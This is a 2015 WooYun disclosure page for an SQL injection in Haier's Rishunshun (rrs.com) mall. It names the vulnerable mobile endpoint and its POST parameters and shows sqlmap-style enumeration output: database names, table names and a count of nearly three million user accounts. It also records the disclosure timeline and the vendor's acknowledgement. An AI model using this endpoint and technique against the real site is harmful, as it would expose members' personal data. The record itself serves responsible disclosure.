当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148958

漏洞标题:海尔旗下日日顺商城SQL注入可导致300万会员信息泄漏

相关厂商:海尔集团

漏洞作者: 撸撸侠

提交时间:2015-10-23 18:08

修复时间:2015-12-10 10:24

公开时间:2015-12-10 10:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

海尔旗下日日顺商城sql注入可导致300万会员信息泄漏

详细说明:

http://m.rrs.com/snaplb/FAQ/listByNum.ajax
post data:
count=10&startNum=0&isRecommend=1&faqQuestion=angelina

available databases [19]:
[*] aijia
[*] hibernate
[*] huxing
[*] information_schema
[*] iudp_basedata
[*] iudp_huxing
[*] iudp_rbac
[*] iudp_sheji
[*] jackrabbit
[*] mrrs
[*] mrrs-uat
[*] mrrs_pro
[*] mrrs_shop
[*] mysql
[*] quartz
[*] rrscommunity
[*] sampledata
[*] shorturl
[*] snap_haier


Database: snap_haier
[198 tables]
+---------------------------------------+
| activity_clean_code_data              |
| area_data                             |
| area_data_bak                         |
| area_data_bak_13121101                |
| attachment                            |
| attitude_of_user_toward_object        |
| attitude_statistics_toward_object     |
| best_service_case                     |
| blog_attachment                       |
| blog_attachment_download_record       |
| blog_comment                          |
| blog_excellent_record                 |
| blog_image                            |
| blog_lightblog                        |
| blog_lightblog_statistics             |
| blog_like_record                      |
| blog_report_record                    |
| branch_record                         |
| city_data_weather                     |
| cms_base                              |
| cms_base_content_ref                  |
| cms_content                           |
| cms_content_top                       |
| code                                  |
| comment_guide_info_pc                 |
| comment_guide_info_tbl                |
| common_click_count                    |
| content_filter_word                   |
| credit_blog_record                    |
| credit_contribution_record            |
| credit_record                         |
| credit_setting                        |
| daily_recommend                       |
| ds_business_oppo_et                   |
| ds_room_picture_et                    |
| ds_room_picture_et_copy               |
| dynamic_image                         |
| faq_content                           |
| feed                                  |
| feed_all_inbox                        |
| feed_followed_inbox                   |
| feed_followed_personal_inbox          |
| feed_follower_personal_about_me_inbox |
| feed_follower_personal_inbox          |
| feed_integrated_inbox                 |
| feed_topic_followed_inbox             |
| feed_topic_inbox                      |
| feed_topic_personal_inbox             |
| following_count                       |
| following_log                         |
| following_relation                    |
| gf_gift_receive_record_et             |
| gift_packs                            |
| gift_packs_detail                     |
| gift_packs_user_ref                   |
| hot_lightblog_historical              |
| hot_lightblog_monthly                 |
| hot_lightblog_weekly                  |
| interact_topic                        |
| interact_topic_category               |
| interact_topic_comment                |
| interact_topic_count                  |
| interact_topic_four_type              |
| interact_topic_good                   |
| interact_topic_vote                   |
| invitation                            |
| invitation_authority                  |
| leave_message_tbl                     |
| lg_interface_invoke_et                |
| lg_interface_invoke_ht                |
| lg_job_et                             |
| login_record                          |
| ls_appraise_record_et                 |
| ls_appraise_record_ht                 |
| ls_workorder_et                       |
| ls_workorder_ht                       |
| ls_workorder_waiter_et                |
| magnetic_stripe_table                 |
| monthly_top20_blogs                   |
| mytest                                |
| notification                          |
| notification_template                 |
| parameters_config                     |
| personal_setting_item                 |
| personal_setting_item_spec            |
| personal_setting_value_spec           |
| prize                                 |
| product_failure                       |
| product_pic                           |
| product_register_record               |
| recommendation                        |
| refered_user_recent_record            |
| register_invitation_code              |
| register_temporary_record             |
| rel_wiki_hotkey                       |
| rel_wiki_one                          |
| sh_experience_comment_et              |
| sh_experience_praise_et               |
| sh_experience_recommend_et            |
| sh_experience_recommend_ht            |
| sh_experience_statistics_et           |
| sh_free_comment_et                    |
| sh_haier_back_record                  |
| sh_user_win                           |
| sh_user_win_comment_et                |
| sh_user_win_praise_et                 |
| share_stuff                           |
| share_stuff_comment                   |
| share_stuff_good                      |
| share_stuff_tags                      |
| social_assess_record                  |
| st_appraise_record                    |
| st_social_assess_record               |
| st_workorder                          |
| star_shop_table                       |
| strainer_record                       |
| sys_data                              |
| sys_mode_info                         |
| tag                                   |
| tag_map                               |
| template                              |
| test                                  |
| tmp_ds_room_picture_et                |
| tmp_ls_workorder_et_bak               |
| tmp_sh_user_win                       |
| tmp_sys_mode_info                     |
| tmp_user_hits_hot                     |
| tmp_user_integral_details_all         |
| tmp_userprofile                       |
| tmp_userprofile_bak                   |
| topic                                 |
| topic_category                        |
| topic_reply_detail                    |
| topic_statistics                      |
| topic_statistics_of_user              |
| topic_subscription_record             |
| topic_visit_record                    |
| unit_base_data                        |
| unit_base_data_bak                    |
| unit_house_data                       |
| unit_house_data_bak                   |
| unit_house_data_bak_13121101          |
| unit_house_data_copy                  |
| unit_house_temp                       |
| unit_shop_data                        |
| up_city_info                          |
| up_codelist                           |
| up_province_et                        |
| up_province_et_copy                   |
| user_account                          |
| user_account_copy                     |
| user_address                          |
| user_address_for_act                  |
| user_area_record                      |
| user_authority                        |
| user_business_authority               |
| user_daily_recommend                  |
| user_friends_tbl                      |
| user_goodskill_rt                     |
| user_goodskill_rt_bak                 |
| user_hits_hot                         |
| user_integral_details_all             |
| user_integral_details_one             |
| user_integral_grade                   |
| user_integral_prize                   |
| user_integral_source                  |
| user_refer_record                     |
| user_regist_tbl                       |
| user_related_policy                   |
| userprofile                           |
| userprofile_achievement               |
| userprofile_bak                       |
| userprofile_complete_degree           |
| userprofile_education_experience      |
| userprofile_obtain_phone_record       |
| userprofile_project_experience        |
| userprofile_project_experience_detail |
| userprofile_skill_support_record      |
| userprofile_skill_support_statistics  |
| userprofile_statistics                |
| userprofile_training_experience       |
| userprofile_work_experience           |
| value_added_products                  |
| visit                                 |
| vote                                  |
| vote_detail                           |
| vote_option                           |
| vote_result                           |
| water_purifier                        |
| web_click_count                       |
| web_click_uv_count                    |
| wiki_base                             |
| wiki_base_content_ref                 |
| wiki_content                          |
| wiki_content_top                      |
| winning_info                          |
| world_cup_activity_tbl                |
| world_cup_support_num                 |
+---------------------------------------+


Database: snap_haier
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| user_account | 2985422 |
+--------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-10-26 10:23

厂商回复:

感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无